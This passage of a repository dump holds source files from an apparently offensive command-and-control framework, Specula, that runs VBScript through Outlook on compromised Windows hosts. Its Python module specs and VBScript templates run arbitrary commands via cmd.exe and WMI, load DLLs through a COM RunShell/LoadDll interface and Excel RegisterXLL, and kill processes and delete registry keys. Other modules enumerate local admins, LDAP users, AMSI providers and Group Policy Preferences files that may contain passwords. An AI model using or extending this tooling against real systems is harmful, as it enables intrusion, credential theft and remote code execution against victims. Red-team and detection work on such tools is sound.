11 | 12 | It uses Scripting.FileSystemObject 13 | - GetAbsolutePathName 14 | - BuildPath 15 | - FolderExists 16 | - CreateFolder 17 | """ 18 | self.entry = 'create_dir' 19 | self.depends = ['./helperFunctions/dir_creator.txt'] 20 | self.options['directory'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Directory to create. i.e. c:\\parent\\child", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_basic.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from datetime import datetime 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates basic details about the host. It retrieves: 10 | - %Computername% 11 | - %Username% 12 | - %Userdomain% 13 | - %Userprofile% 14 | - %Userdnsdomain% 15 | - %Logonserver% 16 | - %Homepath% 17 | 18 | It uses Wscript.Shell 19 | - ExpandEnvironmentStrings 20 | """ 21 | self.entry = 'list_basic' 22 | self.depends = [] 23 | super().__init__(templatepath) 24 | 25 | def rethandler(self, agent, options, data): 26 | if ("-VSTO" not in agent.hostname): # Handle exception when VSTO agents are used 27 | agent.hostname = data.split()[3] 28 | agent.username = data.split()[1] 29 | 30 | -------------------------------------------------------------------------------- /functions/execute/host/cmd.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Execute a command via cmd.exe and print any output to the agent log file. 
11 | Uses the cmd /c prefix 12 | 13 | It uses Wscript.shell 14 | - Run 15 | 16 | It uses Scripting.FileSystemObject 17 | - OpenTextFile 18 | - FileExists 19 | - GetSpecialFolder 20 | - GetTempname 21 | - DeleteFile 22 | 23 | """ 24 | self.entry = 'Execute_CMD' 25 | self.options['command'] = { 26 | "value": None, 27 | "required": True, 28 | "description": "Command to execute on remote target", 29 | "handler": quotedstring 30 | } 31 | super().__init__(templatepath) 32 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocpid.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module terminates the process id you define using the pid option. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select Name,ProcessId,ParentProcessId from Win32_Process Where ProcessID = VARIABLE 14 | - Query.Terminate() 15 | """ 16 | self.entry = 'KillProc_PID' 17 | self.depends = [] 18 | self.options['pid'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "PID of the process you want to kill, all instances will be killed", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/api/verify_api.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Checks if the API is working or not. 
If this returns an error you should investigate the api installation. 10 | 1. Is the dll present on system? The dll paths pushed through the install_api module can be found under info/dbdata. 11 | 2. Is the necesarry registry keys present on the host? 12 | 3. Consider re-running the api_install 13 | 4. Could it be an EDR blocking you :INSERT SCREAMING GIF HERE: 14 | """ 15 | self.entry = 'api_verify' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | 19 | def rethandler(self, agent, options, data): 20 | if data == "False": 21 | agent.api_verified = False 22 | if data == "True": 23 | agent.api_verified = True -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedpowershell.txt: -------------------------------------------------------------------------------- 1 | Function list_installedpowershell() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | 6 | keyps3 = "SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine" 7 | keyps1 = "SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" 8 | 9 | poshkey = "SOFTWARE\Microsoft\PowerShell" 10 | objReg.EnumKey 2147483650, keyps1, arrSubKeys 11 | objReg.GetStringValue 2147483650, keyps1, "PowerShellVersion", ver2 12 | 13 | objReg.EnumKey 2147483650, keyps3, arrSubKeys 14 | objReg.GetStringValue 2147483650, keyps3, "PowerShellVersion", ver3 15 | 16 | If IsNull(ver3) Then 17 | If IsNull(ver2) Then 18 | val = "nothing" 19 | Else 20 | val = ver2 21 | End If 22 | Else 23 | val = ver3 24 | End If 25 | 26 | list_installedpowershell = "PowerShell Version: " & val & vbCrlf & vbCrLf 27 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_networklogon.txt: -------------------------------------------------------------------------------- 1 | 
Function list_networklogon() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2") 5 | Set colNetLogProfs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkLoginProfile",,48) 6 | 7 | For Each NIC in colNetLogProfs 8 | For Each netlogAttribute in NIC.Properties_ 9 | if Not (IsNull(netlogAttribute.value) OR IsEmpty(netlogAttribute.value)) Then 10 | if IsArray(netlogAttribute) then 11 | netlogResponse = netlogResponse & netlogAttribute.Name & ": " & Join(netlogAttribute, ", ") & vbCrLf 12 | else 13 | netlogResponse = netlogResponse & netlogAttribute.Name & ": " & netlogAttribute.value & vbCrLf 14 | end if 15 | end if 16 | Next 17 | Next 18 | list_networklogon = netlogResponse 19 | End Function -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.idl: -------------------------------------------------------------------------------- 1 | // SpeculaApi.idl : IDL source for SpeculaApi 2 | // 3 | 4 | // This file will be processed by the MIDL tool to 5 | // produce the type library (SpeculaApi.tlb) and marshalling code. 
6 | 7 | import "oaidl.idl"; 8 | import "ocidl.idl"; 9 | 10 | [ 11 | object, 12 | uuid(b0f5f947-8064-48f7-a623-5c058dc91cc8), 13 | dual, 14 | nonextensible, 15 | pointer_default(unique) 16 | ] 17 | interface ISepcula : IDispatch 18 | { 19 | [id(1)] HRESULT RunShell([in] BSTR cmd, [in, optional] VARIANT timeout, [out, retval] BSTR* result); 20 | [id(2)] HRESULT LoadDll([in] BSTR path, [in] boolean persist, [out, retval] boolean* status); 21 | }; 22 | [ 23 | uuid(5be8ef76-6253-482a-926e-d1d877de3b63), 24 | version(1.0), 25 | ] 26 | library SpeculaApiLib 27 | { 28 | importlib("stdole2.tlb"); 29 | [ 30 | uuid(e8b55279-c6b4-48f3-8138-b727337c0236) 31 | ] 32 | coclass Sepcula 33 | { 34 | [default] interface ISepcula; 35 | }; 36 | }; 37 | 38 | import "shobjidl.idl"; 39 | -------------------------------------------------------------------------------- /functions/operation/specula/remove_allowlongscriptruntime.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | import uuid 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module removes the registry keys that allows long running scripts such as list_dir running recurse or service acl enumeration. 
11 | 12 | The following value gets removed with this module: 13 | reg add "HKCU\Software\Microsoft\Internet Explorer\Styles" /v "MaxScriptStatements" /t REG_DWORD /d 0xFFFFFFFF /f 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).DeleteValue 18 | """ 19 | self.entry = 'RemoveAllowLongScriptRuntime' 20 | self.depends = ['./helperFunctions/Delregvalue_hkcu.txt'] 21 | 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_amsiproviders.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the AMSI Providers registered on the system. 10 | Based on MS documentation: 11 | https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/ba-p/2572371 12 | Gets the GUID and figures out the names from the Classes\\guid table in registry 13 | 14 | It uses WbemScripting.SWbemNamedValueSet 15 | - Add 16 | - Add.__ProviderArchitecture 17 | 18 | It uses WbemScripting.SWbemLocator 19 | - ConnectServer(root\cimv2) 20 | - ConnectServer(root\cimv2).EnumKey 21 | - ConnectServer(root\cimv2).GetStringValue 22 | """ 23 | self.entry = 'list_amsiproviders' 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/operation/file/list_shortcutinfo.txt: -------------------------------------------------------------------------------- 1 | Function list_shortcutinfo() 2 | On error resume next 3 | Set objShell = window.external.OutlookApplication.CreateObject("WScript.Shell") 4 | Set lnk = objShell.CreateShortcut({{file}}) 5 | list_shortcutinfo = "Fullname:" & lnk.fullname & vbCrLF 6 | 
list_shortcutinfo = list_shortcutinfo & "Arguments: " & lnk.arguments & vbCrLF 7 | list_shortcutinfo = list_shortcutinfo & "Description: " & lnk.description & vbCrLF 8 | list_shortcutinfo = list_shortcutinfo & "Hotkey: " & lnk.hotkey & vbCrLF 9 | list_shortcutinfo = list_shortcutinfo & "IconLocation: " & lnk.iconlocation & vbCrLF 10 | list_shortcutinfo = list_shortcutinfo & "RelativePath: " & lnk.relativepath & vbCrLF 11 | list_shortcutinfo = list_shortcutinfo & "TargetPath: " & lnk.TargetPath & vbCrLF 12 | list_shortcutinfo = list_shortcutinfo & "WindowStyle: " & lnk.windowstyle & vbCrLF 13 | list_shortcutinfo = list_shortcutinfo & "WorkingDirectory: " & lnk.workingdirectory & vbCrLF 14 | End Function -------------------------------------------------------------------------------- /functions/operation/network/nslookup.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = r""" 9 | This module attempts to recreate nslookup in vbscript. 10 | This will use the WMI class Win32_PingStatus to ping the host and get the IP address. 11 | Resolving the IP will fail if ping is not allowed. 
12 | 13 | It uses: 14 | WbemScripting.SWbemLocator 15 | ConnectServer(".", "root\cimv2") 16 | SELECT * FROM Win32_PingStatus WHERE Address 17 | """ 18 | self.entry = 'nslookup' 19 | self.depends = [] 20 | self.options['hostname'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Hostname to resolve", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | -------------------------------------------------------------------------------- /functions/operation/registry/delkeyhkcuregistry.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module deletes registry key in the HKCU hive specified in the PathToKey option recursivly. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - ConnectServer(root\cimv2).DeleteKey 14 | 15 | DeleteKey 16 | """ 17 | self.entry = 'DelKey_HKCU_Registry' 18 | self.depends = ['./helperFunctions/Delregkey_hkcu.txt'] 19 | self.options['PathToKey'] = { 20 | "value": None, 21 | "required": True, 22 | "description": "Path to the key you would like to delete. 
Example: Software\\EvilCorp\\subkey", 23 | "handler": quotedstring 24 | } 25 | super().__init__(templatepath) 26 | -------------------------------------------------------------------------------- /helperFunctions/Getallregkeys.txt: -------------------------------------------------------------------------------- 1 | Function GetAllRegKeys(Root, Regpath, Arch, RootInt) 2 | On Error Resume Next 3 | GetAllRegKeys = "Failed to get values under " & Root & "\" & Regpath 4 | const REG_SZ = 1 5 | const REG_EXPAND_SZ = 2 6 | const REG_BINARY = 3 7 | const REG_DWORD = 4 8 | const REG_MULTI_SZ = 7 9 | const REG_QWORD = 11 10 | Set oCtx = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet") 11 | oCtx.Add "__ProviderArchitecture", Arch 12 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 13 | Set objreg = objLocator.ConnectServer(".","root\cimv2","","",,,,oCtx).Get("StdRegProv") 14 | objreg.EnumKey RootInt, Regpath, arrKeys 15 | GetAllRegKeys = "Listing keys under " & Root & "\" & Regpath & vbCrLf 16 | For Each subkey in arrKeys 17 | GetAllRegKeys = GetAllRegKeys & Root & "\" & Regpath & "\" & subkey & vbCrLf 18 | Next 19 | 20 | GetAllRegKeys = GetAllRegKeys & "-----------------------------------------" & vbCrLf 21 | End Function 22 | -------------------------------------------------------------------------------- /helperFunctions/dir_creator.txt: -------------------------------------------------------------------------------- 1 | Function dir_creator(folderpath) 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | strDir = fs.GetAbsolutePathName(folderpath) 5 | arrDirs = Split( strDir, "\" ) 6 | If Left( strDir, 2 ) = "\\" Then 7 | strDirBuild = "\\" & arrDirs(2) & "\" & arrDirs(3) & "\" 8 | idxFirst = 4 9 | Else 10 | strDirBuild = arrDirs(0) & "\" 11 | idxFirst = 1 12 | End If 13 | 14 | For i = idxFirst to Ubound( arrDirs ) 15 | 
strDirBuild = fs.BuildPath( strDirBuild, arrDirs(i) ) 16 | If Not fs.FolderExists( strDirBuild ) Then 17 | fs.CreateFolder strDirBuild 18 | End if 19 | Next 20 | 21 | if fs.FolderExists(folderpath) then 22 | dir_creator = "Folder path: " & folderpath & " created successfully" 23 | else 24 | dir_creator = "Failed to create folder path: " & folderpath & " - Possibly permission issue" 25 | end if 26 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_iprouting.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the IP Routing table using the Win32_IP4RouteTable and the Win32_IP4PersistedRouteTable classes. 10 | (Only a few selected attributes is dumped) 11 | Official documentation: 12 | - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4routetable 13 | - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4persistedroutetable 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - Query: SELECT * FROM Win32_IP4RouteTable 18 | - Query: SELECT * FROM Win32_IP4PersistedRouteTable 19 | """ 20 | self.entry = 'list_iprouting' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/operation/file/copy_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will 
copy a file. 10 | 11 | It uses Scripting.FileSystemObject 12 | - CopyFile 13 | - FileExists 14 | """ 15 | self.entry = 'copy_file' 16 | self.depends = [] 17 | self.options['file'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path and filename of source file. i.e. c:\\foo.txt.", 21 | "handler": quotedstring 22 | } 23 | self.options['destination'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "Path and filename of destination file. i.e. c:\\bar.txt.", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_amsiproviders.txt: -------------------------------------------------------------------------------- 1 | Function list_amsiproviders() 2 | On error resume next 3 | const REG_SZ = 1 4 | const REG_EXPAND_SZ = 2 5 | const REG_BINARY = 3 6 | const REG_DWORD = 4 7 | const REG_MULTI_SZ = 7 8 | const REG_QWORD = 11 9 | 10 | myoutput = "Registered AMSI providers found on system:" & vbCrLf 11 | Set oCtx = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet") 12 | oCtx.Add "__ProviderArchitecture", 64 13 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 14 | Set objreg = objLocator.ConnectServer(".","root\cimv2","","",,,,oCtx).Get("StdRegProv") 15 | objreg.EnumKey 2147483650, "Software\Microsoft\AMSI\Providers", arrKeys 16 | For Each subkey in arrKeys 17 | myoutput = myoutput & "Provider guid: " & subkey & vbCrLf 18 | objReg.GetStringValue 2147483650,"Software\Classes\CLSID\" & subkey,"",strValue 19 | myoutput = myoutput & "CLSID name: " & strValue & vbCrLf & vbCrLf 20 | Next 21 | list_amsiproviders = myoutput 22 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_localadmins.py: 
-------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the local administrators on the host specified with the inMachine option 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select * from Win32_ComputerSystem 14 | - Query: SELECT * FROM Win32_GroupUser WHERE GroupComponent=Win32_Group.Domain=VARIABLE,Name='Administrators' 15 | """ 16 | self.entry = 'list_localadmins' 17 | self.depends = [] 18 | self.options['host'] = { 19 | "value": ".", 20 | "required": True, 21 | "description": "The machine you want to list local admins from. It defaults to localhost using .", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_user.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the user specified in the samaccountName option. 11 | If user account is found it also enumerates the properties of the account. 
12 | If account not found it will say so in the returned data 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer(\\root\\directory\\LDAP) 16 | - Query: SELECT * FROM ds_user Where DS_sAMAccountName = VARIABLE 17 | """ 18 | self.entry = 'list_user' 19 | self.depends = [] 20 | self.options['samaccountname'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "samaccountname to retreive information for", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | -------------------------------------------------------------------------------- /functions/operation/outlook/list_notifications.txt: -------------------------------------------------------------------------------- 1 | Function list_notifications() 2 | On Error Resume Next 3 | version = left(window.external.OutlookApplication.Version,4) 4 | basepath = "software\microsoft\office\outlook\Settings\Data" 5 | basepath2 = "SOFTWARE\Microsoft\Office\" & version & "\Outlook\Preferences" 6 | 7 | 'Toast 8 | list_notifications = list_notifications & GetRegValue("HKCU", basepath, "global_Mail_NewmailToast", 64, 2147483649, "STDREGPROV") & vbCrLf & vbCrLf 9 | 10 | 'Sound 11 | list_notifications = list_notifications & GetRegValue("HKCU", basepath, "global_Mail_PlaySound", 64, 2147483649, "STDREGPROV") & vbCrLf 12 | list_notifications = list_notifications & GetRegValue("HKCU", basepath2, "PlaySound", 64, 2147483649, "STDREGPROV") & vbCrLf & vbCrLf 13 | 14 | 'envelope 15 | list_notifications = list_notifications & GetRegValue("HKCU", basepath, "global_Mail_ShowEnvelope", 64, 2147483649, "STDREGPROV") & vbCrLf 16 | list_notifications = list_notifications & GetRegValue("HKCU", basepath2, "ShowEnvelope", 64, 2147483649, "STDREGPROV") & vbCrLf & vbCrLf 17 | End Function -------------------------------------------------------------------------------- /functions/execute/host/wmi_execute.py: -------------------------------------------------------------------------------- 1 | from 
lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module executes the specified command in the command option using the objProcess.Create method in WMI. 11 | It also returns the process ID of the new process you created. 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\cimv2) 15 | - ConnectServer(root\cimv2).Get("Win32_ProcessStartup").SpawnInstance_() 16 | - ConnectServer(root\cimv2).Get("Win32_Process") 17 | """ 18 | self.entry = 'Execute_WMICommand' 19 | self.depends = [] 20 | self.options['command'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Command to execute via wmi Process Create", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/file/move_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will move a file. This can also be used to rename a file. 10 | 11 | It uses Scripting.FileSystemObject 12 | - MoveFile 13 | - FileExists 14 | """ 15 | self.entry = 'move_file' 16 | self.depends = [] 17 | self.options['file'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path and filename of source file. i.e. c:\\foo.txt.", 21 | "handler": quotedstring 22 | } 23 | self.options['destination'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "Path and filename of destination file. i.e. 
c:\\bar.txt.", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/file/check_filehash.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module gets the MD5 hash of the file specified. 10 | 11 | It uses System.Security.Cryptography.MD5CryptoServiceProvider 12 | - ComputeHash_2 13 | - Hash 14 | 15 | It uses ADODB.Stream 16 | - Open 17 | - LoadFromFile 18 | - Position 19 | - Read 20 | - Close 21 | 22 | It uses MSXML2.DOMDocument 23 | - CreateElement 24 | """ 25 | self.entry = 'check_filehash' 26 | self.depends = [] 27 | self.options['file'] = { 28 | "value": None, 29 | "required": True, 30 | "description": "path to file you want to get MD5 hash for", 31 | "handler": quotedstring 32 | } 33 | super().__init__(templatepath) 34 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_gpp.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.depends = ['./helperFunctions/dir_lister.txt'] 9 | self.help = """ 10 | Lists Group Policy Preferences files local on host that could contain passwords, configurations or other data. 
11 | It looks inside C:\\Windows\\System32\\GroupPolicy\\DataStore\\0\\sysvol\\domain.com\\Policies\\ on the local host for the following files 12 | Groups.xml 13 | Drives.xml 14 | Services.xml 15 | ScheduledTasks.xml 16 | Datasources.xml 17 | Printers.xml 18 | 19 | It uses Wscript.Shell 20 | - ExpandEnvironmentStrings 21 | 22 | It uses Scripting.FileSystemObject 23 | - FolderExists 24 | - GetFolder 25 | - GetFolder().Files 26 | - GetBaseName 27 | - GetExtensionName 28 | """ 29 | self.entry = 'list_gpp' 30 | self.depends = [] 31 | super().__init__(templatepath) 32 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_processes.txt: -------------------------------------------------------------------------------- 1 | Function list_processes() 2 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 3 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 4 | Set col = objWMIService.ExecQuery ("Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process") 5 | procs = "PID" & vbTab & "PPID" & vbTab & "Arch" & vbTab & "ProcessName" & vbTab & vbTab & vbTab & "Executable Path" & vbCrLf 6 | For Each obj in col 7 | if obj.VirtualSize < 4000000000 Then 8 | procarch = "x86" 9 | if obj.processid = "0" then 10 | procarch = "x64" 11 | end if 12 | if obj.processid = "4" then 13 | procarch = "x64" 14 | end if 15 | else 16 | procarch = "x64" 17 | end if 18 | if obj.Name = "Memory Compression" Then 19 | procarch = "x64" 20 | end if 21 | if obj.Name = "Registry" Then 22 | procarch = "x64" 23 | end if 24 | procs = procs & obj.ProcessId & vbTab & obj.ParentProcessId & vbTab & procarch & vbTab & obj.Name & vbTab & vbTab & vbTab & obj.ExecutablePath & vbCrLf 25 | Next 26 | list_processes = procs 27 | End Function -------------------------------------------------------------------------------- /functions/operation/file/copy_dir.py: 
-------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will copy a directory including all subdirectories/files. 10 | Specify paths without trailing \\. 11 | 12 | It uses Scripting.FileSystemObject 13 | - CopyFolder 14 | - FolderExists 15 | """ 16 | self.entry = 'copy_dir' 17 | self.depends = [] 18 | self.options['directory'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "Directory you want to copy. i.e. c:\\folder", 22 | "handler": quotedstring 23 | } 24 | self.options['destination'] = { 25 | "value": None, 26 | "required": True, 27 | "description": "Destination directory you want your copy. i.e. c:\\copyoffolder", 28 | "handler": quotedstring 29 | } 30 | super().__init__(templatepath) -------------------------------------------------------------------------------- /lib/handlers/redirect_template.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Search Plugin 6 | 30 | 32 | 33 | 34 | 35 |
36 |

searchplugin

37 | 38 | 39 |
40 | 41 | 42 | -------------------------------------------------------------------------------- /functions/execute/host/execute_registerxll.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module runs the registerxll function in excel, allowing you to execute a DLL(XLL). 10 | 11 | XLL file must be on disk, does not work over http. The XLL can be named whatever as extension. (or nothing at all) 12 | 13 | For tips on how to create a XLL you can go here: 14 | https://learn.microsoft.com/en-us/office/client-developer/excel/creating-xlls 15 | 16 | 17 | It uses the excel application 18 | - Registerxll 19 | """ 20 | self.entry = 'execute_registerxll' 21 | self.depends = [] 22 | self.options['input'] = { 23 | "value": None, 24 | "required": True, 25 | "description": "Path to xll file on disk", 26 | "handler": quotedstring 27 | } 28 | super().__init__(templatepath) 29 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentcommands.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates recent executed commands from the registry 10 | HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU 11 | 12 | It uses WbemScripting.SWbemNamedValueSet 13 | - Add.__ProviderArchitecture 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).EnumValues 18 | - ConnectServer(root\cimv2).GetStringValue 19 | - 
ConnectServer(root\cimv2).GetExpandedStringValue 20 | - ConnectServer(root\cimv2).GetBinaryValue 21 | - ConnectServer(root\cimv2).GetDWORDValue 22 | - ConnectServer(root\cimv2).GetMultiStringValue 23 | - ConnectServer(root\cimv2).GetQWORDValue 24 | """ 25 | self.entry = 'list_recentcommands' 26 | self.depends = ['./helperFunctions/Getallregvalues.txt'] 27 | super().__init__(templatepath) 28 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocname.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module terminates the process name you define using the process option. 10 | Be careful, since it will kill all processes with that name. 11 | Meaning if you define winword.exe it will kill all instances of winword.exe 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\cimv2) 15 | - Query: Select Name,ProcessId,ParentProcessId from Win32_Process Where Name = VARIABLE 16 | - Query.Terminate() 17 | 18 | """ 19 | self.entry = 'KillProc_Name' 20 | self.depends = [] 21 | self.options['process'] = { 22 | "value": None, 23 | "required": True, 24 | "description": "process name you want to kill, all instances will be killed", 25 | "handler": quotedstring 26 | } 27 | super().__init__(templatepath) 28 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_environmentvariables.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 
